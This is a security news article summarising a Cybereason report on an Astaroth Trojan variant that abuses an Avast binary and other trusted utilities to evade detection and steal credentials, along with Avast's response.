A newly published report from the Nocturnus Research team at Cybereason reveals how an Astaroth Trojan variant uses Avast antivirus software to gain information about the target system.
This particular Astaroth campaign requires the victim to download a .7zip file containing a .lnk file that initialises the malware itself. This then spawns a process using the Windows Management Instrumentation Command (wmic.exe) utility to initialise an XSL script processing attack.
This remote script contains well obfuscated code that uses several functions to hide from antivirus defences and researchers alike – the script initiates the download of the payload files disguised as images and extension-less files with the Trojan modules.
This is where things get really interesting.
A Cybereason Active Hunting Service spokesperson said that the "analysis of the tools and techniques used in the Astaroth campaign show how truly effective these methods are at evading antivirus products". The techniques in question involved using the Avast antivirus Runtime Dynamic Link Library 'aswrundll.exe' to load a malicious module that then loads further malicious modules and gathers information about the machine.
One of these modules collects and exfiltrates clipboard data, password information and more.
aswrundll.exe is very similar to Microsoft’s own rundll32.exe, which has also been used by malicious actors over the years, as it enables the execution of DLLs by calling their exported functions.
These are what has become known as a 'Living Off the Land Binaries' or LOLBins for short.
Cybereason warns that "because of the great potential for malicious exploitation inherent in the use of LOLBins, it's very likely many other information stealers will adopt this method to deliver their payload into targeted machines".
The Astaroth Trojan itself is nothing new, but Cybereason researchers reckon this new variant differs 'dramatically' from those that have gone before in many ways. As well as downloading the payload using a Background Intelligent Transfer Service (BITSAdmin) utility, rather than the certutil.exe command line, it also used a fromCharCode() deobfuscation method so as not to explicitly write execution commands that might reveal what it is up to.
The researchers note that earlier versions of Astaroth would quit if Avast antivirus was detected, whereas this variant makes use of the LOLBins method to 'inject' a malicious module into one of its processes.
It also makes malicious use of the uninstallation 'unins000.exe' process belonging to a Brazilian information security company called GAS Tecnologia to gather information undetected – information including users’ keystrokes, operating system calls and anything saved to the clipboard continuously.
In conjunction with network password recovery tool (netpass.exe), it also gathers user login passwords undetected, including remote computers on LAN, mail and messenger accounts.
"As Avast is the most common antivirus software in the world, this is an effective evasive strategy," the Cybereason report states. Something that Avast itself disputes.
"Misusing a trusted binary is a known issue that can’t be avoided," Luis Corrons, security evangelist at Avast, told SC Media UK. "In this instance, they are using an Avast file to run a binary in a similar way that a DLL using Windows' rundll32.exe can run."
However, Corrons emphasised that this is not an injection and that installed Avast binaries have self-protection mechanisms to avoid injections anyway.
As far as Astaroth is concerned, Corrons said, "Knowing that attackers make use of this technique is exactly why our Behavior Shield monitors the actions that take place on a computer, even if said actions are carried out by a trusted application."
So, if that behaviour is the expected one there will be no action, but if there are abnormalities that indicate malicious activity, "Avast will take care of the potential threat," Corrons said.